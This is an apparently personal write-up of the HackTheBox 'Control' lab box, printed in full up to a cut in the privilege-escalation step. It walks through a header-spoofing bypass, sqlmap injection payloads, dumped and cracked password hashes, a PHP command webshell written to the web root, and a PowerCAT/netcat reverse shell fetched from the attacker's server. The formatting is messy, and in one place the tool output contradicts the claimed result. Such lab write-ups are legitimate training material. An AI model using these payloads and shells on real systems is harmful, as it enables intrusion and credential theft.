As always we start with a nmap scan
# Nmap 7.80 scan initiated Fri Jan 3 10:25:07 2020 as: nmap -sC -sV -oA control-nmap 10.10.10.167 Nmap scan report for 10.10.10.167 Host is up (0.033s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Fidelity 135/tcp open msrpc Microsoft Windows RPC 3306/tcp open mysql? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: |_ Host '10.10.16.70' is not allowed to connect to this MariaDB server 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.80%I=7%D=1/3%Time=5E0F5CE5%P=x86_64-pc-linux-gnu%r(HTT SF:POptions,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2 SF:ookie,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x20allowed\x20to\x20conne SF:ct\x20to\x20this\x20MariaDB\x20server"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jan 3 10:25:32 2020 -- 1 IP address (1 host up) scanned in 25.52 seconds
There is a website hosted in the default tcp port called “Fidelity”
There are 4 pages, index page, an about page, Admin page and login page. The admin and login pages did not provide any login form, but with an error “Access Denied: Header Missing. Please ensure you go through the proxy to access this page“. This error pointing towards a misconfiguration. So I proceed to analyze the source-code.
The source-code of index.php has commented section with a message -To-do:
1
2
3
4
5
|
<em>< !— To Do: — >
Import Products
Link to new payment system
Enable SSL (Certificates location \192.168.4.28\myfiles)
< !— Header — ></em>
|
This revealed an internal IP address: 192.168.4.28d. I fire-up the burp to see if there is any requests being sent ot receives.
The Burp request also showed the request isn’t going to the webserver, but the same error comes if I request to access admin.php or login.php pages.
So, to access these either you need to have a proxy which allows you the access or simulate that you are using the proxy by adding HTTP header “X-Forwarded-For”. The Burp is useful to add such headers, so I’m going to use my already running Burp. I’m assuming that the IP 192.168.4.28 for x-forwarded-for IP (proxy) because this is the only internal IP I’ve found in the websites source-code and it actually worked.
1
|
Header X–Forwarded–For value ==> “192.168.4.28”
|
As soon as I forward the request in Burp, I was able to access the admin panel (or a product page).
SQLi
So the next step was to find the SQLi in the products table. I used burp to extract search requests from the database to use exploit it using SQLMAP.
The Info:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
POST /search_products.php HTTP/1.1
Host: 10.10.10.167
User–Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,<em>/</em>;q=0.8
Accept–Language: en–US,en;q=0.5
Accept–Encoding: gzip, deflate
Referer: http://10.10.10.167/admin.php
Content–Type: application/x–www–form–urlencoded
Content–Length: 26
x–forwarded–for: 192.168.4.28
Connection: close
Upgrade–Insecure–Requests: 1
productName=D–Link+DWA–171
|
I saved the info as control.txt. and run the SQLMAP using this command: sqlmap –all -r control.txt –batch
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
|
root@kali~/htb/control/ sqlmap —all –r control.txt —batch
___
__H__
___ ___[)]_____ ___ ___ {1.3.12.1#dev}
|_ –| . [“] | .’| . |
|___|_ [‘]_|_|_|__,| _|
|_|V… |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:14:03 /2019-12-07/
[14:14:03] [INFO] parsing HTTP request from ‘control.txt’
[14:14:04] [INFO] testing connection to the target URL
[14:14:05] [INFO] testing if the target URL content is stable
[14:14:05] [INFO] target URL content is stable
[14:14:05] [INFO] testing if POST parameter ‘productName’ is dynamic
[14:14:05] [WARNING] POST parameter ‘productName’ does not appear to be dynamic
[14:14:05] [INFO] heuristic (basic) test shows that POST parameter ‘productName’ might be injectable (possible DBMS: ‘MySQL’)
[14:14:06] [INFO] heuristic (XSS) test shows that POST parameter ‘productName’ might be vulnerable to cross-site scripting (XSS) attacks
[14:14:06] [INFO] testing for SQL injection on POST parameter ‘productName’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] Y
[14:14:06] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[14:14:08] [INFO] testing ‘Boolean-based blind – Parameter replace (original value)’
[14:14:09] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause (MySQL comment)’
[14:14:17] [INFO] testing ‘OR boolean-based blind – WHERE or HAVING clause (MySQL comment)’
[14:14:18] [WARNING] reflective value(s) found and filtering out
[14:14:19] [INFO] POST parameter ‘productName’ appears to be ‘OR boolean-based blind – WHERE or HAVING clause (MySQL comment)’ injectable (with –string=”36“)
[14:14:19] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)’
[14:14:19] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (BIGINT UNSIGNED)’
[14:14:19] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)’
[14:14:19] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (EXP)’
[14:14:19] [INFO] testing ‘MySQL >= 5.7.8 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)’
[14:14:20] [INFO] testing ‘MySQL >= 5.7.8 OR error-based – WHERE or HAVING clause (JSON_KEYS)’
[14:14:20] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[14:14:20] [INFO] POST parameter ‘productName’ is ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’ injectable
[14:14:20] [INFO] testing ‘MySQL inline queries’
[14:14:20] [INFO] testing ‘MySQL >= 5.0.12 stacked queries (comment)’
[14:14:31] [INFO] POST parameter ‘productName’ appears to be ‘MySQL >= 5.0.12 stacked queries (comment)’ injectable
[14:14:31] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’
[14:14:41] [INFO] POST parameter ‘productName’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
[14:14:41] [INFO] testing ‘Generic UNION query (NULL) – 1 to 20 columns’
[14:14:41] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 20 columns’
[14:14:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:14:42] [INFO] ‘ORDER BY’ technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:14:43] [INFO] target URL appears to have 6 columns in query
[14:14:43] [INFO] POST parameter ‘productName’ is ‘MySQL UNION query (NULL) – 1 to 20 columns’ injectable
[14:14:43] [WARNING] in OR boolean–based injection cases, please consider usage of switch ‘–drop-set-cookie’ if you experience any problems during data retrieval
POST parameter ‘productName’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 86 HTTP(s) requests:
—–
Parameter: productName (POST)
Type: boolean–based blind
Title: OR boolean–based blind – WHERE or HAVING clause (MySQL comment)
Payload: productName=–6916‘ OR 8776=8776#
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: productName=D-Link DWA-171′ AND (SELECT 3579 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(3579=3579,1))),0x7176786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)— EOXk
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: productName=D–Link DWA–171‘;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productName=D-Link DWA-171′ AND (SELECT 8534 FROM (SELECT(SLEEP(5)))nDKy)— xWso
Type: UNION query
Title: MySQL UNION query (NULL) – 6 columns
Payload: productName=D–Link DWA–171‘ UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706b71,0x524d51445050564746647064625a4359716b4f4a7853434262624572596a424b5a65535962454f57,0x7176786b71),NULL,NULL#
—
[14:14:43] [INFO] the back-end DBMS is MySQL
[14:14:43] [INFO] fetching banner
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0
banner: ‘10.4.8–MariaDB‘
[14:14:44] [INFO] fetching current user
current user: ‘manager@localhost‘
[14:14:44] [INFO] fetching current database
current database: ‘warehouse‘
[14:14:44] [INFO] fetching server hostname
hostname: ‘Fidelity‘
[14:14:45] [INFO] testing if current user is DBA
[14:14:45] [INFO] fetching current user
current user is DBA: False
[14:14:45] [INFO] fetching database users
database management system users [6]:
[*] ‘hector‘@’localhost‘
[*] ‘manager‘@’localhost‘
[*] ‘root‘@’127.0.0.1‘
[*] ‘root‘@’::1‘
[*] ‘root‘@’fidelity‘
[*] ‘root‘@’localhost‘
[14:14:45] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:14:46] [INFO] using hash method ‘mysql_passwd‘
what dictionary do you want to use?
[1] default dictionary file ‘/usr/share/sqlmap/data/txt/wordlist.tx_‘ (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:14:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:14:46] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:14:46] [INFO] starting 2 processes
[14:16:19] [INFO] cracked password ‘l3tm3!n‘ for user ‘manager‘
database management system users password hashes:
[*] hector [1]:
password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
clear–text password: l3tm3!n
[*] root [1]:
password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
|
The SQLMAP successfully cracked the database and got me what I was looking for – usernames and passwords (in hash)
1
2
3
4
5
6
7
8
9
|
database management system users password hashes:
[*] hector [1]:
password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
clear–text password: l3tm3!n
[*] root [1]:
password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
|
I can’t do anything with the passwords I have, I can’t log in to the system unless I upload the shell to get RCE from SQLi. So what I decided is to use Burp again to send my PHP payload to create a reverse shell inside the database system. I found several RCEs, but used this one. I modified a bit and my final payload would look like this:
Easier is to use
root@kali:~/htb/control# cat s2.php <?php echo shell_exec($_GET["cmd"]); ?> root@kali:~/htb/control# sqlmap -r req --dbms mysql --file-write=s2.php --file-dest="C:/Inetpub/wwwroot/s2.php" ___ __H__ ___ ___[.]_____ ___ ___ {1.3.8#stable} |_ -| . [)] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 03:03:32 /2020-02-27/ [03:03:32] [INFO] parsing HTTP request from 'req' [03:03:32] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: productName (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: productName=-4687' OR 8277=8277# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: productName=blah' AND (SELECT 1098 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(1098=1098,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SQcG Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: productName=blah';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: productName=blah' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))VIiw)-- ZBOf Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: productName=blah' UNION ALL SELECT NULL,CONCAT(0x716b6b7671,0x7474516e41764359637658616b4e77796557634a77594f6d7a4247674e4c5476696b6e4644446964,0x717a717171),NULL,NULL,NULL,NULL# --- [03:03:32] [INFO] testing MySQL [03:03:33] [INFO] confirming MySQL [03:03:33] [INFO] the back-end DBMS is MySQL web server operating system: Windows 10 or 2016 web application technology: Microsoft IIS 10.0, PHP 7.3.7 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [03:03:33] [INFO] fingerprinting the back-end DBMS operating system [03:03:33] [INFO] the back-end DBMS operating system is Windows [03:03:34] [WARNING] potential permission problems detected ('Access denied') [03:03:34] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done) do you want confirmation that the local file 's2.php' has been successfully written on the back-end DBMS file system ('C:/Inetpub/wwwroot/s2.php')? [Y/n] y [03:03:46] [INFO] the local file 's2.php' and the remote file 'C:/Inetpub/wwwroot/s2.php' have the same size (41 B) [03:03:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167' [03:03:46] [WARNING] you haven't updated sqlmap for more than 208 days!!! [*] ending @ 03:03:46 /2020-02-27/ root@kali:~/htb/control#
POWERCAT REVERSE SHELL
Now, I need a reverse connection from the Control machine. Since the machine is windows, I would go for PowerShell reverse shells. After reading and a lot of research, I decided to use PowerCAT.
Setup:
- I download the PowerCAT.ps1 to the working directory
- Setup the Python HTTP server: python -m SimpleHTTPServer 8081
- A netcat listener: nc –lvnp 8080
- And finally “calling it from the website” to make it work (very simple words).
The Activator:
ref: https://www.sherlocklee.top/2019/09/28/Reverse-Shell/
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.167 - - [27/Feb/2020 03:17:19] "GET /powercat.ps1 HTTP/1.1" 200 -
root@kali:~/htb/control# rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50670 Microsoft Windows [Version 10.0.17763.805] (c) 2018 Microsoft Corporation. All rights reserved. C:\inetpub\wwwroot>whoami whoami nt authority\iusr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is C05D–877F
Directory of C:\Users
11/05/2019 02:34 PM <DIR> .
11/05/2019 02:34 PM <DIR> ..
11/05/2019 02:34 PM <DIR> Administrator
11/01/2019 11:09 AM <DIR> Hector
10/21/2019 04:29 PM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 42,980,626,432 bytes free
C:\Users>cd Administrator
cd Administrator
Access is denied.
C:\Users>cd Hector
cd Hector
Access is denied.
|
I have access to the system, however, I’m not able to list the user directories. There are two users, an Administrator and Hector – I have access denied to both user directories.
BUILDING THE TUNNEL: (THIS IS A FAILED STEP, PLEASE PROCEED TO ” WHITE WINTER WOLF WEBSHELL” SECTION)
I fired-up netstat -ano to see the processes running and listening.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
C:\inetpub\wwwroot>netstat –ano
netstat –ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 792
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1904
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 456
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 332
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 948
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1784
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 592
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 584
TCP 10.10.10.167:80 10.10.14.21:35928 ESTABLISHED 4
TCP 10.10.10.167:49677 10.10.14.21:8080 ESTABLISHED 4632
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 792
TCP [::]:3306 [::]:0 LISTENING 1904
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 456
TCP [::]:49665 [::]:0 LISTENING 332
TCP [::]:49666 [::]:0 LISTENING 948
TCP [::]:49667 [::]:0 LISTENING 1784
TCP [::]:49668 [::]:0 LISTENING 592
TCP [::]:49669 [::]:0 LISTENING 584
UDP 0.0.0.0:123 *:* 1980
UDP 0.0.0.0:5353 *:* 1236
UDP 0.0.0.0:5355 *:* 1236
UDP 127.0.0.1:58934 *:* 948
UDP [::]:123 *:* 1980
UDP [::]:5353 *:* 1236
UDP [::]:5355 *:* 1236
C:\inetpub\wwwroot>
|
I found that the WinRM service is active and running (TCP [::]:5985 [::]:0 LISTENING 4). This service running locally I’m not able to access externally, so the next step is to create a tunnel between my Kali and the Control machine. I will use the windows binary in kali PuTTY PLINK to create the tunnel.
1
2
3
4
|
root@kali~/htb/control locate plink.exe
/usr/share/windows–resources/binaries/plink.exe
root@ns09 ~/htb/control
|
Uploading PLink.exe
Now this seems to be a hard task for me. I tried following but I have an error:
Setup Python SMBServer
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
root@kali~/impacket/examples master ± python smbserver.py ROPNOP /usr/share/windows–resources/binaries/
Impacket v0.9.20–dev – Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8–1670–01D3–1278–5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098–A112–3610–9833–46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.167,49680)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49680)
[*] Remaining connections []
[*] Incoming connection (10.10.10.167,49681)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49681)
[*] Remaining connections []
|
Copy PLink.exe using Command Prompt:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
C:\inetpub\wwwroot\uploads>dir
dir
Volume in drive C has no label.
Volume Serial Number is C05D–877F
Directory of C:\inetpub\wwwroot\uploads
12/07/2019 07:00 PM <DIR> .
12/07/2019 07:00 PM <DIR> ..
11/11/2019 12:59 PM 6 rev.php
11/11/2019 12:59 PM 6 rev2.php
11/11/2019 12:59 PM 6 shell.php
12/07/2019 07:00 PM <DIR> test
3 File(s) 18 bytes
3 Dir(s) 43,625,472,000 bytes free
C:\inetpub\wwwroot\uploads>copy \\10.10.14.21\ROPNOP\usr\share\windows–resources\binaries\plink.exe
copy \\10.10.14.21\ROPNOP\usr\share\windows–resources\binaries\plink.exe
You can‘t connect to the file share because it’s not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
|
WHITEWINTERWOLF WEBSHELL
So, my plan to copy PuTTY PLINK using good boy way was failed so badly that I went to sleep shutting down my laptop. In the sleep, I was told by the angels that I could use WhiteWinterWolf’s Webshell to upload my PuTTY PLINK Here is what I did:
- I copied Webshell PHP script on to a file called “nshell.php”
- I used the same old resources text I used to run SQLMAP in my earlier step
- I created a new SQLMAP query to copy the script into C:\inetpub\wwwroot\uploads\
My new SQLMAP script:
1
2
|
sqlmap –r control2.txt —file–write=/root/htb/control/nshell.php —file–dest=c:/inetpub/wwwroot/nshell.php
|
After running the SQLMAP, my new shell was successfully uploaded.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
root@kali:~/htb/control# sqlmap -r control.txt –file-write=/root/htb/control/nshell.php –file-dest=c:/inetpub/wwwroot/nshell.php [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 03:29:32 /2020-02-27/ [03:29:32] [INFO] parsing HTTP request from ‘control.txt’ Type: error-based Type: stacked queries Type: time-based blind Type: UNION query [*] ending @ 03:29:52 /2020-02-27/ |
As soon as I have the confirmation from SQLMAP that my shell was uploaded successfully, I opened my browser and browsed the shell:
I upload the nc.exe and PuTTY PLINK to be sure to make at least 1 connection run properly.
I’m going to run the PLink.exe first because I wanted to test if this can help me. I know nc.exe will work for sure, but I haven’t tried Plink for tunneling. Let us try.
The tunnel was successfully created
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
C:\inetpub\wwwroot\uploads>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.11 FATAL ERROR: Network error: Connection refused Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 The programs included with the Kali GNU/Linux system are free software; |
Now I can run EvilWiNRM localy on the Control machine. However, I’m still low privileged user, so I need to run EvilWinRM as user Hector. if you remember in my initial SQLMAP scan it revealed 3 users’ password hashes.
hector : password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager : password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA clear-text password: l3tm3!n
root : password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
SQLMAP managed to get the user Manager’s password in clear text, however, our Hector’s password is still unknown, I used John to crack the password. l33th4x0rhector
0e178792e8fc304a2e3133d535d38caf1da3cd9d:l33th4x0rhector
Time to run EvilWinRM as Hector: ( and getting user.txt )
GETTING ROOT
In order to get Root, we need to escalate the privilege of our current user, Hector. This article and this article gives a great way of windows privesc. I had to read several such articles to find the right way to become Administrator of Control machine.
Let us see what is our user Hector is capable to do?
1
2
3
4
5
6
7
8
9
10
11
|
*Evil–WinRM* PS C:\Users\Hector\Desktop> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
———————————
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
|
Is there any Administrator groups?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
*Evil–WinRM* PS C:\Users\Hector\Desktop>
*Evil–WinRM* PS C:\Users\Hector\Desktop> net localgroup Administrators
net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
———————————————————————————————————————–
Administrator
The command completed successfully.
*Evil–WinRM* PS C:\Users\Hector\Desktop>
|
1
2
3
4
5
6
7
8
9
|
*Evil–WinRM* PS C:\Users\Hector\Desktop>
*Evil–WinRM* PS C:\Users\Hector\Desktop> cmdkey /list
cmdkey /list
Currently stored credentials:
* NONE *
*Evil–WinRM* PS C:\Users\Hector\Desktop>
|
So the cmdkey /list also didn’t give me any hint of stored credentials in the box. Its getting a bit hard for me at this stage.
The Windows ACL (Access Control List) is the most important command to run post-exploit. This gives a hint about how the current compromised user can help in privesc. I’m concentrating on the System’s CurrentControlSet to see what type of rights our user Hector has. The command is: get-acl HKLM:\System\CurrentControlSet\services* | Format-List * | findstr /i "Hector Users Path
“
The command returned with huge list of ACL of user Hector:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
|
*Evil–WinRM* PS C:\Users\Hector\Desktop> get–acl HKLM:\System\CurrentControlSet\services\* | Format–List * | findstr /i “Hector Users Path”
get–acl HKLM:\System\CurrentControlSet\services\* | Format–List * | findstr /i “Hector Users Path”
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data Provider for Oracle
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data
BUILTIN\Users Allow ReadKey
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
